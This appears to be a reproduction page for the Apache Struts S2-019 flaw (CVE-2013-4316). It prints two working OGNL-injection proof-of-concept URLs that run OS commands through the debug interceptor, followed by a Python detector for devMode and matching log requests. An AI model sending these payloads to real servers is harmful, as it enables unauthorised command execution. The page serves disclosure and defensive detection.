S2-019 (CVE-2013-4316)

1. Vulnerability overview

2. Affected versions

Struts 2.0.0 - Struts 2.3.15.1

3. Reproduction

Root cause

<constant name="struts.devMode" value="true" />

POC

https://www.0-sec.org/example/HelloWorld.action?debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27ipconfig%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29
https://www.0-sec.org/example/HelloWorld.action?debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%22whoami%22).getInputStream())),%23resp.getWriter().flush(),%23resp.getWriter().close()
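Two defender-side checks that follow from the root cause and the POC pattern above, added here as an example and not part of the original page: one flags a struts.xml that enables struts.devMode, the other scans web access-log lines for requests that drive the DebuggingInterceptor with debug=command plus an expression parameter. The log lines and struts.xml snippet are constructed samples.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, parse_qs

# Constructed sample struts.xml with the weak setting from the page.
STRUTS_XML = '<struts><constant name="struts.devMode" value="true" /></struts>'

# Constructed access-log lines: one normal request, one S2-019-style request,
# and one debug=xml request (value-stack dump, not OGNL evaluation).
LOG = """\
203.0.113.7 - - [10/Jul/2013:12:00:01 +0000] "GET /example/HelloWorld.action?name=bob HTTP/1.1" 200 512
203.0.113.7 - - [10/Jul/2013:12:00:09 +0000] "GET /example/HelloWorld.action?debug=command&expression=%23context.get(%27x%27) HTTP/1.1" 200 1031
203.0.113.9 - - [10/Jul/2013:12:01:15 +0000] "GET /example/HelloWorld.action?debug=xml HTTP/1.1" 200 2048
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def devmode_enabled(struts_xml: str) -> bool:
    """True when the struts.xml text sets the struts.devMode constant to true."""
    root = ET.fromstring(struts_xml)
    for const in root.iter("constant"):
        if const.get("name") == "struts.devMode":
            return const.get("value", "").strip().lower() == "true"
    return False  # absent constant: Struts defaults devMode to false


def suspicious_request(url: str) -> bool:
    """True when the query asks DebuggingInterceptor to evaluate an OGNL expression.

    In devMode, debug=command makes the interceptor evaluate the 'expression'
    parameter; parse_qs percent-decodes the values for us.
    """
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    if "command" not in qs.get("debug", []):
        return False
    return any(e.strip() for e in qs.get("expression", []))


def scan_access_log(log_text: str) -> list:
    """Return the request targets in the log that match the S2-019 pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m and suspicious_request(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    print("devMode enabled:", devmode_enabled(STRUTS_XML))
    print("suspicious requests:", scan_access_log(LOG))
```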